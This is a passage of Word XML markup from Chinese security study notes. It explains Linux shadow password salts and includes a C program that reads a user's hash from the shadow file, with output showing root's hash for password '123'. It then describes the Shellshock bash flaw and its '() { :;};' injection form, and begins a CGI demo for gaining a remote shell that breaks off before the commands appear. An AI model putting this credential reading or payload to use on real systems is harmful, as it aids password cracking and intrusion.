        <w:t>我们还是从标准源文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中查找答案。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，我们找到了与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt_make_salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crypt_make_salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中出现了很多的判断条件来选择以何种方式加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值来判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但其中对我们最重要的一条语句是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gensalt(salt_len)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们继续查看了函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static char *gensalt (unsigned int salt_size)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，才发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现原来神秘无比的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数只是某个固定长度的随机字符串而已。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终结论</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在我们每次改写密码时，都会随机生成一个这样的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们登录时输入的明文密码经过上述的演化后与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的密码域进行字符串比较，以此来判断是否允许用户登录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【注】：经过上述的分析，我们发现破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的口令也不是什么难事，但前提是你有机会拿到对方的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;pwd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;stddef.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;shadow.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    if(argc &lt; 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        printf("no usrname input");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    if (geteuid() != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        fprintf(stderr, "must be setuid root");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    struct spwd *shd= getspnam(argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    if(shd != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        static char crypt_char[80];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        strcpy(crypt_char, shd-&gt;sp_pwdp);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        char salt[13];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        int i=0,j=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        while(shd-&gt;sp_pwdp[i]!='\0')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            salt[i]=shd-&gt;sp_pwdp[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            if(salt[i]=='$')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">                j++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">                if(j==3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">                    salt[i+1]='\0';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        if(j&lt;3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            perror("file error or user cannot use.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        if(argc==3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            printf("salt: %s, crypt: %s\n", salt, crypt(argv[2], salt));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            printf("shadowd passwd: %s\n", shd-&gt;sp_pwdp);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gcc passwd.c -lcrypt -o passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./passwd root 123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> salt: $1$Bg1H/4mz$, crypt: $1$Bg1H/4mz$X89TqH7tpi9dX1B9j5YsF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">            shadowd passwd: $1$Bg1H/4mz$X89TqH7tpi9dX1B9j5YsF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00A16B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00A16B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全漏洞（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A16B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2014-6271</w:t>
      </w:r>
      <w:r w:rsidRPr="00A16B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞起源：</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漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告，其中出现了一条验证命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="001348BA" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="425" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5381625" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="223" name="图片 223" descr="说明: 图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descr="说明: 图0.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81625" cy="847725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令，可能会得到以下输出：</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vulnerable</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this is a test</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其中如果出现第一行vulnerable则说明该系统存在一个由bash程序缺陷导致的任意命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞原理及分析：</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lastRenderedPageBreak/>
        <w:t>该脚本的出现引起了金山安全中心的技术人员的关注，其中env为一个系统命令，该命令让系统创建一个环境变量</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Pr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2000250" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="222" name="图片 222" descr="说明: 图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descr="说明: 图00.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00250" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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并且带着这个环境变量的值执行bash-c “echo this is a test”。第一行输出的”vulnerable”暴露了漏洞的存在，因为函数定义’() { :;};’之后的’echo vulnerable’指令本不该被执行却被执行。对bash详细分析后得知bash在处理含有函数定义诸如”() { :;};”的环境变量赋值的代码上存在设计缺陷，错误地将函数定义后面的字符串作为命令执行。</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所以真正的利用与env命令无关，只要设法让系统接受一个含有”[函数定义]+[任意命令]”的环境变量赋值则可触发”[任意命令]”部分所表示的代码执行。</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Style w:val="ac"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞存在条件：</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任何已知程序，只要满足以下两个条件就可以被用来通过bash漏洞导致任意命令执行：</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1、程序在某一时刻使用bash作为脚本解释器处理环境变量赋值；</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2、环境变量赋值字符串的提交取决于用户输入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞利用演示：</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以下给出一个可能出现的应用案例，该案例通过进攻一个基于bash的cgi应用页面获取目标计算机的远程shell。</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首先有一个基于bash的cgi网页应用存在于Apache服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cgi-bin目录下，cgi脚本内容为：</w:t>
      </w:r>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="221" name="图片 221" descr="说明: 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descr="说明: 图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1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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使用正常浏览器访问结果为一个普通页面：</w:t>
      </w:r>
      <w:r w:rsidRPr="001348BA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5133975" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="220" name="图片 220" descr="说明: 图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descr="说明: 图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33975" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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但是我们可以通过curl等模拟http请求的工具构造一个不同寻常的http请求，命令如下：</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Pr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="219" name="图片 219" descr="说明: 图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descr="说明: 图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15000" cy="571500"/>
                    </a:xfrm>
